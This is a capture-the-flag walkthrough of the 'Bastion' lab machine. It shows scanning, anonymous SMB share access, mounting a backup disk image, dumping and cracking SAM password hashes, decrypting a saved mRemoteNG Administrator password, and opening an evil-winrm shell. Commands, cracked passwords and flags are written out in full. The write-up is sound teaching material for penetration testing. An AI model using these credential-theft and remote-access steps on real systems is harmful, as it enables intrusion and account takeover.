Bastion

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.134 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Jul  6 23:31:29 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.046s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

# Nmap done at Wed Jul  6 23:31:43 2022 -- 1 IP address (1 host up) scanned in 14.49 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Jul  6 23:33:05 2022 as: nmap -sCV -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -oN targeted 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.046s latency).

PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m57s, deviation: 1h09m14s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-07-06T21:34:19
|_  start_date: 2022-07-06T21:30:09
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-07-06T23:34:18+02:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  6 23:34:23 2022 -- 1 IP address (1 host up) scanned in 77.44 seconds

Let's try to list the SMB shares with smbclient.

smbclient -L 10.10.10.134 -N

-L get a list of shares available on the host.
-N makes use of a null session, don't ask for password.

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There is one interesting share called Backups. Let's see if we can read it's content with smbmap.

smbmap -H 10.10.10.134 -u "root"

-H IP address of host.
-u username.

[+] Guest session       IP: 10.10.10.134:445    Name: 10.10.10.134                                      
[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\RIZUAFDCYT, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Exploitation

As we can read and write in the Backups share, we could make a new directory called smb, and mount that share on that directory.

mkdir smb
mount -t c //10.10.10.134/Backup smb/

Now we can see the content of the Backups share more comfortably. If we inspect the share, we'll see two .vhd files.

.vhd files represents a virtual hard disk drive. It contains the same as what can be found on a physical hard disk, such as disk partitions and a file system, apart from files and folders.

ls -l smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/

total 5330560
-rwxr-xr-x 1 root root   37761024 Feb 22  2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22  2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root       1186 Feb 22  2019 BackupSpecs.xml
-rwxr-xr-x 1 root root       1078 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root       8930 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root       6542 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root       2894 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root       1488 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root       1484 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root       3844 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root       3988 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root       7110 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root    2374620 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

To see what is in those files, we'll have to mount them to a new directory. Let's create the vhd directory, and mount try to mount those files into that directory with guestmount.

mkdir vhd
guestmount -a smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro vhd/

-a add image.
-i automatically mount filesystems.
--ro mount read-only.

Now we could see a Windows filesystem inside the vhd/ directory.

ls -l vhd/

total 2096729
drwxrwxrwx 1 root root          0 Feb 22  2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24 Jun 10  2009  autoexec.bat
-rwxrwxrwx 1 root root         10 Jun 10  2009  config.sys
lrwxrwxrwx 2 root root         14 Jul 14  2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22  2019  pagefile.sys
drwxrwxrwx 1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx 1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx 1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx 1 root root          0 Feb 22  2019  Recovery
drwxrwxrwx 1 root root       4096 Feb 22  2019 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 22  2019  Users
drwxrwxrwx 1 root root      16384 Feb 22  2019  Windows

As we have access to the entire Windows filesystem, we could try to obtain some credentials with the SAM and SYSTEM files located in the C:\Windows\System32\config directory.

cd vhd3/Windows/System32/config

To extract the password hashes from those files, we'll have to use secretsdump.

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

-sam SAM file to parse.
-system SYSTEM file to parse.

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

Now that we have the NT hashes for the system users, we could try to break those hashes with john.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hashes

Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)     
bureaulampje     (L4mpje)     
2g 0:00:00:04 DONE (2022-08-31 13:32) 0.4807g/s 2258Kp/s 2258Kc/s 2259KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

Now that we have the password for the L4mpje user, we could log in via SSH to the machine as the L4mpje user. Then, we'll be able to grab the user flag.

sshpass -p 'bureaulampje' ssh L4mpje@10.10.10.134

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>whoami                                                                                           
bastion\l4mpje                                                                                                                  

l4mpje@BASTION C:\Users\L4mpje>type \Users\L4mpje\Desktop\user.txt                                                              
84736c68b1c7ddb6dbd2ac0546dbfd3b

Privilege Escalation

At this point, if we start enumerating the system, we'll see that the mRemoteNG software is available on the system.

dir "\Program Files (x86)"

 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 1B7D-E692                                                                                              

 Directory of C:\Program Files (x86)                                                                                            

22-02-2019  15:01    <DIR>          .                                                                                           
22-02-2019  15:01    <DIR>          ..                                                                                          
16-07-2016  15:23    <DIR>          Common Files                                                                                
23-02-2019  10:38    <DIR>          Internet Explorer                                                                           
16-07-2016  15:23    <DIR>          Microsoft.NET                                                                               
22-02-2019  15:01    <DIR>          mRemoteNG                                                                                   
23-02-2019  11:22    <DIR>          Windows Defender                                                                            
23-02-2019  10:38    <DIR>          Windows Mail                                                                                
23-02-2019  11:22    <DIR>          Windows Media Player                                                                        
16-07-2016  15:23    <DIR>          Windows Multimedia Platform                                                                 
16-07-2016  15:23    <DIR>          Windows NT                                                                                  
23-02-2019  11:22    <DIR>          Windows Photo Viewer                                                                                   
16-07-2016  15:23    <DIR>          Windows Portable Devices                                                                               
16-07-2016  15:23    <DIR>          WindowsPowerShell                                                                                      
               0 File(s)              0 bytes                                                                                              
              14 Dir(s)   4.791.787.520 bytes free

If we search on the internet ways to escalate privileges exploiting this software, we'll find a GitHub repository, with a python script.

git clone https://github.com/kmahyyg/mremoteng-decrypt

This python script is able to decode the encoded passwords stored in the \Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml file.

type \Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

...
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
...                                                                                            
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
...

Let's copy the Administrator encoded password, and run the python script.

python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Password: thXLHM96BeKL0ER2

Now that we have the Administrator password, we could get a shell with evil-winrm, and then all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.134 -u "Administrator" -p "thXLHM96BeKL0ER2"

-i remote host IP address.
-u username.
-p password.

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
d144298c9e51bb792d4336f5b5045c74

Last updated 2 years ago

Was this helpful?